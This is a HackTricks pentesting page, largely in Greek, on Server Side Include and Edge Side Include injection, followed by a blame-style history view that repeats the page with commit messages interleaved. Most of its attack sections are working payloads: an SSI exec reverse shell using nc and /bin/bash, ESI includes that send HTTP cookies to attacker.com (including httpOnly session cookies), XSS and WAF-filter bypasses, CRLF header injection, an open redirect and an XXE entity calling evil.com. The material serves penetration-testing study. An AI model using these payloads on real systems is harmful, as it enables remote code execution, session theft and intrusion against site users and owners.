hacktricks/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md

# Server Side Inclusion/Edge Side Inclusion Injection

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## Server Side Inclusion Basic Information

**(Introduction taken from [Apache docs](https://httpd.apache.org/docs/current/howto/ssi.html))**

SSI (Server Side Includes) είναι εντολές που **τοποθετούνται σε σελίδες HTML και αξιολογούνται στον διακομιστή** ενώ οι σελίδες εξυπηρετούνται. Σας επιτρέπουν να **προσθέσετε δυναμικά παραγόμενο περιεχόμενο** σε μια υπάρχουσα σελίδα HTML, χωρίς να χρειάζεται να εξυπηρετήσετε ολόκληρη τη σελίδα μέσω ενός προγράμματος CGI ή άλλης δυναμικής τεχνολογίας.\
Για παράδειγμα, μπορείτε να τοποθετήσετε μια εντολή σε μια υπάρχουσα σελίδα HTML, όπως:

`<!--#echo var="DATE_LOCAL" -->`

Και, όταν η σελίδα εξυπηρετείται, αυτό το τμήμα θα αξιολογηθεί και θα αντικατασταθεί με την τιμή του:

`Tuesday, 15-Jan-2013 19:28:54 EST`

Η απόφαση για το πότε να χρησιμοποιήσετε SSI και πότε να έχετε τη σελίδα σας να παράγεται εξ ολοκλήρου από κάποιο πρόγραμμα, είναι συνήθως θέμα του πόσο στατική είναι η σελίδα και πόσο χρειάζεται να επαναϋπολογίζεται κάθε φορά που εξυπηρετείται η σελίδα. Το SSI είναι ένας εξαιρετικός τρόπος για να προσθέσετε μικρά κομμάτια πληροφοριών, όπως η τρέχουσα ώρα - όπως φαίνεται παραπάνω. Αλλά αν η πλειοψηφία της σελίδας σας παράγεται τη στιγμή που εξυπηρετείται, πρέπει να αναζητήσετε κάποια άλλη λύση.

Μπορείτε να συμπεράνετε την παρουσία του SSI αν η διαδικτυακή εφαρμογή χρησιμοποιεί αρχεία με τις επεκτάσεις ** `.shtml`, `.shtm` ή `.stm`**, αλλά δεν είναι μόνο αυτή η περίπτωση.

Μια τυπική έκφραση SSI έχει την εξής μορφή:
```
<!--#directive param="value" -->
```
### Έλεγχος
```javascript
// Document name
<!--#echo var="DOCUMENT_NAME" -->
// Date
<!--#echo var="DATE_LOCAL" -->

// File inclusion
<!--#include virtual="/index.html" -->
// Including files (same directory)
<!--#include file="file_to_include.html" -->
// CGI Program results
<!--#include virtual="/cgi-bin/counter.pl" -->
// Including virtual files (same directory)
<!--#include virtual="file_to_include.html" -->
// Modification date of a file
<!--#flastmod file="index.html" -->

// Command exec
<!--#exec cmd="dir" -->
// Command exec
<!--#exec cmd="ls" -->
// Reverse shell
<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->

// Print all variables
<!--#printenv -->
// Setting variables
<!--#set var="name" value="Rich" -->

```
## Edge Side Inclusion

Υπάρχει ένα πρόβλημα **με την αποθήκευση πληροφοριών ή δυναμικών εφαρμογών** καθώς μέρος του περιεχομένου μπορεί να έχει **διαφορεθεί** για την επόμενη φορά που θα ανακτηθεί το περιεχόμενο. Αυτό είναι που χρησιμοποιείται το **ESI**, για να υποδείξει χρησιμοποιώντας ετικέτες ESI το **δυναμικό περιεχόμενο που πρέπει να παραχθεί** πριν από την αποστολή της έκδοσης cache.\
Εάν ένας **επιτιθέμενος** είναι σε θέση να **εισάγει μια ετικέτα ESI** μέσα στο περιεχόμενο cache, τότε θα μπορούσε να είναι σε θέση να **εισάγει αυθαίρετο περιεχόμενο** στο έγγραφο πριν σταλεί στους χρήστες.

### ESI Detection

Η παρακάτω **κεφαλίδα** σε μια απάντηση από τον διακομιστή σημαίνει ότι ο διακομιστής χρησιμοποιεί ESI:
```
Surrogate-Control: content="ESI/1.0"
```
Αν δεν μπορείτε να βρείτε αυτή την κεφαλίδα, ο διακομιστής **μπορεί να χρησιμοποιεί ESI ούτως ή άλλως**.\
Μια **προσέγγιση τυφλής εκμετάλλευσης μπορεί επίσης να χρησιμοποιηθεί** καθώς ένα αίτημα θα πρέπει να φτάσει στον διακομιστή των επιτιθεμένων:
```javascript
// Basic detection
hell<!--esi-->o
// If previous is reflected as "hello", it's vulnerable

// Blind detection
<esi:include src=http://attacker.com>

// XSS Exploitation Example
<esi:include src=http://attacker.com/XSSPAYLOAD.html>

// Cookie Stealer (bypass httpOnly flag)
<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>

// Introduce private local files (Not LFI per se)
<esi:include src="supersecret.txt">

// Valid for Akamai, sends debug information in the response
<esi:debug/>
```
### ESI exploitation

[GoSecure δημιούργησε](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/) έναν πίνακα για να κατανοήσουμε τις πιθανές επιθέσεις που μπορούμε να δοκιμάσουμε σε διάφορα λογισμικά που υποστηρίζουν ESI, ανάλογα με τη λειτουργικότητα που υποστηρίζουν:

* **Includes**: Υποστηρίζει την εντολή `<esi:includes>`
* **Vars**: Υποστηρίζει την εντολή `<esi:vars>`. Χρήσιμο για την παράκαμψη φίλτρων XSS
* **Cookie**: Τα cookies του εγγράφου είναι προσβάσιμα στον κινητήρα ESI
* **Upstream Headers Required**: Οι εφαρμογές υποκατάστασης δεν θα επεξεργαστούν δηλώσεις ESI εκτός αν η upstream εφαρμογή παρέχει τις κεφαλίδες
* **Host Allowlist**: Σε αυτή την περίπτωση, οι ESI includes είναι δυνατές μόνο από επιτρεπόμενους διακομιστές, καθιστώντας το SSRF, για παράδειγμα, δυνατό μόνο κατά αυτών των διακομιστών

|         **Software**         | **Includes** | **Vars** | **Cookies** | **Upstream Headers Required** | **Host Whitelist** |
| :--------------------------: | :----------: | :------: | :---------: | :---------------------------: | :----------------: |
|            Squid3            |      Yes     |    Yes   |     Yes     |              Yes              |         No         |
|         Varnish Cache        |      Yes     |    No    |      No     |              Yes              |         Yes        |
|            Fastly            |      Yes     |    No    |      No     |               No              |         Yes        |
| Akamai ESI Test Server (ETS) |      Yes     |    Yes   |     Yes     |               No              |         No         |
|          NodeJS esi          |      Yes     |    Yes   |     Yes     |               No              |         No         |
|         NodeJS nodesi        |      Yes     |    No    |      No     |               No              |      Optional      |

#### XSS

Η παρακάτω εντολή ESI θα φορτώσει ένα αυθαίρετο αρχείο μέσα στην απόκριση του διακομιστή
```xml
<esi:include src=http://attacker.com/xss.html>
```
#### Παράκαμψη προστασίας XSS πελάτη
```xml
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

Use <!--esi--> to bypass WAFs:
<scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript>
<img+src=x+on<!--esi-->error=ale<!--esi-->rt(1)>
```
#### Κλοπή Cookie

* Απομακρυσμένη κλοπή cookie
```xml
<esi:include src=http://attacker.com/$(HTTP_COOKIE)>
<esi:include src="http://attacker.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" />
```
* Κλέψτε το cookie HTTP\_ONLY με XSS αντανακλώντας το στην απάντηση:
```bash
# This will reflect the cookies in the response
<!--esi $(HTTP_COOKIE) -->
# Reflect XSS (you can put '"><svg/onload=prompt(1)>' URL encoded and the URL encode eveyrhitng to send it in the HTTP request)
<!--esi/$url_decode('"><svg/onload=prompt(1)>')/-->

# It's possible to put more complex JS code to steal cookies or perform actions
```
#### Ιδιωτικό Τοπικό Αρχείο

Μην το συγχέετε με μια "Τοπική Συμπερίληψη Αρχείου":
```markup
<esi:include src="secret.txt">
```
#### CRLF
```markup
<esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>
```
#### Open Redirect

Το παρακάτω θα προσθέσει ένα `Location` header στην απάντηση
```bash
<!--esi $add_header('Location','http://attacker.com') -->
```
#### Προσθήκη Κεφαλίδας

* Προσθήκη κεφαλίδας σε αναγκαστικό αίτημα
```xml
<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345"/>
</esi:include>
```
* Προσθέστε κεφαλίδα στην απάντηση (χρήσιμο για να παρακάμψετε το "Content-Type: text/json" σε μια απάντηση με XSS)
```bash
<!--esi/$add_header('Content-Type','text/html')/-->

<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->

# Check the number of url_decode to know how many times you can URL encode the value
```
#### CRLF στο Add header (**CVE-2019-2438**)
```xml
<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345
Host: anotherhost.com"/>
</esi:include>
```
#### Akamai debug

Αυτό θα στείλει πληροφορίες αποσφαλμάτωσης που περιλαμβάνονται στην απάντηση:
```xml
<esi:debug/>
```
### ESI + XSLT = XXE

Με την καθορισμένη τιμή `xslt` για την παράμετρο _dca_, είναι εφικτό να συμπεριληφθεί **`eXtensible Stylesheet Language Transformations (XSLT)`** βασισμένο ESI. Η συμπερίληψη προκαλεί την ανάκτηση των αρχείων XML και XSLT από τον HTTP surrogate, με το δεύτερο να φιλτράρει το πρώτο. Τέτοια αρχεία XML είναι εκμεταλλεύσιμα για επιθέσεις _XML External Entity (XXE)_, επιτρέποντας στους επιτιθέμενους να εκτελούν επιθέσεις SSRF. Ωστόσο, η χρησιμότητα αυτής της προσέγγισης είναι περιορισμένη, καθώς το ESI περιλαμβάνει ήδη ως vector SSRF. Λόγω της απουσίας υποστήριξης στη βασική βιβλιοθήκη Xalan, οι εξωτερικές DTDs δεν επεξεργάζονται, αποτρέποντας την εξαγωγή τοπικών αρχείων.
```xml
<esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" />
```
XSLT αρχείο:
```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xxe [<!ENTITY xxe SYSTEM "http://evil.com/file" >]>
<foo>&xxe;</foo>
```
Check the XSLT page:

{% content-ref url="xslt-server-side-injection-extensible-stylesheet-language-transformations.md" %}
[xslt-server-side-injection-extensible-stylesheet-language-transformations.md](xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
{% endcontent-ref %}

### Αναφορές

* [https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/)
* [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/)
* [https://academy.hackthebox.com/module/145/section/1304](https://academy.hackthebox.com/module/145/section/1304)
* [https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91](https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91)

## Λίστα Ανίχνευσης Brute-Force

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt" %}

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								# Server Side Inclusion/Edge Side Inclusion Injection
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								{% hint style="success" %}
 								Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								<details>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								<summary>Support HackTricks</summary>
-												arte

											
										
										
											2023-12-31 01:25:17 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
 								* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 								* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								{% endhint %}
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								## Server Side Inclusion Basic Information
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								**(Introduction taken from [Apache docs](https://httpd.apache.org/docs/current/howto/ssi.html))**
-												a

											
										
										
											2024-02-05 02:28:59 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								SSI (Server Side Includes) είναι εντολές που **τοποθετούνται σε σελίδες HTML και αξιολογούνται στον διακομιστή** ενώ οι σελίδες εξυπηρετούνται. Σας επιτρέπουν να **προσθέσετε δυναμικά παραγόμενο περιεχόμενο** σε μια υπάρχουσα σελίδα HTML, χωρίς να χρειάζεται να εξυπηρετήσετε ολόκληρη τη σελίδα μέσω ενός προγράμματος CGI ή άλλης δυναμικής τεχνολογίας.\
 								Για παράδειγμα, μπορείτε να τοποθετήσετε μια εντολή σε μια υπάρχουσα σελίδα HTML, όπως:
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
 								`<!--#echo var="DATE_LOCAL" -->`
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								Και, όταν η σελίδα εξυπηρετείται, αυτό το τμήμα θα αξιολογηθεί και θα αντικατασταθεί με την τιμή του:
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								`Tuesday, 15-Jan-2013 19:28:54 EST`
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								Η απόφαση για το πότε να χρησιμοποιήσετε SSI και πότε να έχετε τη σελίδα σας να παράγεται εξ ολοκλήρου από κάποιο πρόγραμμα, είναι συνήθως θέμα του πόσο στατική είναι η σελίδα και πόσο χρειάζεται να επαναϋπολογίζεται κάθε φορά που εξυπηρετείται η σελίδα. Το SSI είναι ένας εξαιρετικός τρόπος για να προσθέσετε μικρά κομμάτια πληροφοριών, όπως η τρέχουσα ώρα - όπως φαίνεται παραπάνω. Αλλά αν η πλειοψηφία της σελίδας σας παράγεται τη στιγμή που εξυπηρετείται, πρέπει να αναζητήσετε κάποια άλλη λύση.
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								Μπορείτε να συμπεράνετε την παρουσία του SSI αν η διαδικτυακή εφαρμογή χρησιμοποιεί αρχεία με τις επεκτάσεις ** `.shtml`, `.shtm` ή `.stm`**, αλλά δεν είναι μόνο αυτή η περίπτωση.
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								Μια τυπική έκφραση SSI έχει την εξής μορφή:
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
+								<!--#directive param="value" -->
 								```
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								### Έλεγχος
-												GitBook: [#3540] No subject

											
										
										
											2022-10-03 13:43:01 +00:00
+								```javascript
 								// Document name
 								<!--#echo var="DOCUMENT_NAME" -->
 								// Date
 								<!--#echo var="DATE_LOCAL" -->
 								// File inclusion
 								<!--#include virtual="/index.html" -->
 								// Including files (same directory)
 								<!--#include file="file_to_include.html" -->
 								// CGI Program results
 								<!--#include virtual="/cgi-bin/counter.pl" -->
 								// Including virtual files (same directory)
 								<!--#include virtual="file_to_include.html" -->
 								// Modification date of a file
 								<!--#flastmod file="index.html" -->
 								// Command exec
 								<!--#exec cmd="dir" -->
 								// Command exec
 								<!--#exec cmd="ls" -->
 								// Reverse shell
 								<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->
 								// Print all variables
 								<!--#printenv -->
 								// Setting variables
 								<!--#set var="name" value="Rich" -->
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
 								```
-												GitBook: [#3540] No subject

											
										
										
											2022-10-03 13:43:01 +00:00
+								## Edge Side Inclusion
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								Υπάρχει ένα πρόβλημα **με την αποθήκευση πληροφοριών ή δυναμικών εφαρμογών** καθώς μέρος του περιεχομένου μπορεί να έχει **διαφορεθεί** για την επόμενη φορά που θα ανακτηθεί το περιεχόμενο. Αυτό είναι που χρησιμοποιείται το **ESI**, για να υποδείξει χρησιμοποιώντας ετικέτες ESI το **δυναμικό περιεχόμενο που πρέπει να παραχθεί** πριν από την αποστολή της έκδοσης cache.\
 								Εάν ένας **επιτιθέμενος** είναι σε θέση να **εισάγει μια ετικέτα ESI** μέσα στο περιεχόμενο cache, τότε θα μπορούσε να είναι σε θέση να **εισάγει αυθαίρετο περιεχόμενο** στο έγγραφο πριν σταλεί στους χρήστες.
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								### ESI Detection
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								Η παρακάτω **κεφαλίδα** σε μια απάντηση από τον διακομιστή σημαίνει ότι ο διακομιστής χρησιμοποιεί ESI:
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
+								Surrogate-Control: content="ESI/1.0"
 								```
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								Αν δεν μπορείτε να βρείτε αυτή την κεφαλίδα, ο διακομιστής **μπορεί να χρησιμοποιεί ESI ούτως ή άλλως**.\
 								Μια **προσέγγιση τυφλής εκμετάλλευσης μπορεί επίσης να χρησιμοποιηθεί** καθώς ένα αίτημα θα πρέπει να φτάσει στον διακομιστή των επιτιθεμένων:
-												GitBook: [#3540] No subject

											
										
										
											2022-10-03 13:43:01 +00:00
+								```javascript
 								// Basic detection
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								hell<!--esi-->o
-												GitBook: [#3733] No subject

											
										
										
											2023-01-04 14:57:03 +00:00
+								// If previous is reflected as "hello", it's vulnerable
 								// Blind detection
 								<esi:include src=http://attacker.com>
-												GitBook: [#3540] No subject

											
										
										
											2022-10-03 13:43:01 +00:00
 								// XSS Exploitation Example
-												GitBook: [#3733] No subject

											
										
										
											2023-01-04 14:57:03 +00:00
+								<esi:include src=http://attacker.com/XSSPAYLOAD.html>
-												GitBook: [#3540] No subject

											
										
										
											2022-10-03 13:43:01 +00:00
 								// Cookie Stealer (bypass httpOnly flag)
-												GitBook: [#3733] No subject

											
										
										
											2023-01-04 14:57:03 +00:00
+								<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>
-												GitBook: [#3540] No subject

											
										
										
											2022-10-03 13:43:01 +00:00
 								// Introduce private local files (Not LFI per se)
 								<esi:include src="supersecret.txt">
 								// Valid for Akamai, sends debug information in the response
 								<esi:debug/>
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								### ESI exploitation
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								[GoSecure δημιούργησε](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/) έναν πίνακα για να κατανοήσουμε τις πιθανές επιθέσεις που μπορούμε να δοκιμάσουμε σε διάφορα λογισμικά που υποστηρίζουν ESI, ανάλογα με τη λειτουργικότητα που υποστηρίζουν:
-												GitBook: [#3540] No subject

											
										
										
											2022-10-03 13:43:01 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								* **Includes**: Υποστηρίζει την εντολή `<esi:includes>`
 								* **Vars**: Υποστηρίζει την εντολή `<esi:vars>`. Χρήσιμο για την παράκαμψη φίλτρων XSS
 								* **Cookie**: Τα cookies του εγγράφου είναι προσβάσιμα στον κινητήρα ESI
 								* **Upstream Headers Required**: Οι εφαρμογές υποκατάστασης δεν θα επεξεργαστούν δηλώσεις ESI εκτός αν η upstream εφαρμογή παρέχει τις κεφαλίδες
 								* **Host Allowlist**: Σε αυτή την περίπτωση, οι ESI includes είναι δυνατές μόνο από επιτρεπόμενους διακομιστές, καθιστώντας το SSRF, για παράδειγμα, δυνατό μόνο κατά αυτών των διακομιστών
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								|         **Software**         | **Includes** | **Vars** | **Cookies** | **Upstream Headers Required** | **Host Whitelist** |
 								| :--------------------------: | :----------: | :------: | :---------: | :---------------------------: | :----------------: |
 								|            Squid3            |      Yes     |    Yes   |     Yes     |              Yes              |         No         |
 								|         Varnish Cache        |      Yes     |    No    |      No     |              Yes              |         Yes        |
 								|            Fastly            |      Yes     |    No    |      No     |               No              |         Yes        |
 								| Akamai ESI Test Server (ETS) |      Yes     |    Yes   |     Yes     |               No              |         No         |
 								|          NodeJS esi          |      Yes     |    Yes   |     Yes     |               No              |         No         |
 								|         NodeJS nodesi        |      Yes     |    No    |      No     |               No              |      Optional      |
-												GitBook: [#3540] No subject

											
										
										
											2022-10-03 13:43:01 +00:00
 								#### XSS
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								Η παρακάτω εντολή ESI θα φορτώσει ένα αυθαίρετο αρχείο μέσα στην απόκριση του διακομιστή
-												a

											
										
										
											2024-02-06 03:10:38 +00:00
+								```xml
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
+								<esi:include src=http://attacker.com/xss.html>
 								```
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								#### Παράκαμψη προστασίας XSS πελάτη
-												a

											
										
										
											2024-02-06 03:10:38 +00:00
+								```xml
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
+								x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
-												GitBook: [#3733] No subject

											
										
										
											2023-01-04 14:57:03 +00:00
 								Use <!--esi--> to bypass WAFs:
 								<scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript>
 								<img+src=x+on<!--esi-->error=ale<!--esi-->rt(1)>
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
+								```
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								#### Κλοπή Cookie
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								* Απομακρυσμένη κλοπή cookie
-												a

											
										
										
											2024-02-06 03:10:38 +00:00
+								```xml
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
+								<esi:include src=http://attacker.com/$(HTTP_COOKIE)>
 								<esi:include src="http://attacker.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" />
 								```
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								* Κλέψτε το cookie HTTP\_ONLY με XSS αντανακλώντας το στην απάντηση:
-												GitBook: [#3733] No subject

											
										
										
											2023-01-04 14:57:03 +00:00
+								```bash
 								# This will reflect the cookies in the response
 								<!--esi $(HTTP_COOKIE) -->
-												a

											
										
										
											2024-02-06 03:10:38 +00:00
+								# Reflect XSS (you can put '"><svg/onload=prompt(1)>' URL encoded and the URL encode eveyrhitng to send it in the HTTP request)
-												GitBook: [#3733] No subject

											
										
										
											2023-01-04 14:57:03 +00:00
+								<!--esi/$url_decode('"><svg/onload=prompt(1)>')/-->
-												a

											
										
										
											2024-02-06 03:10:38 +00:00
+								# It's possible to put more complex JS code to steal cookies or perform actions
 								```
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								#### Ιδιωτικό Τοπικό Αρχείο
-												GitBook: [#3733] No subject

											
										
										
											2023-01-04 14:57:03 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								Μην το συγχέετε με μια "Τοπική Συμπερίληψη Αρχείου":
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
+								```markup
 								<esi:include src="secret.txt">
 								```
-												GitBook: [#3540] No subject

											
										
										
											2022-10-03 13:43:01 +00:00
+								#### CRLF
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
+								```markup
 								<esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>
 								```
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								#### Open Redirect
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
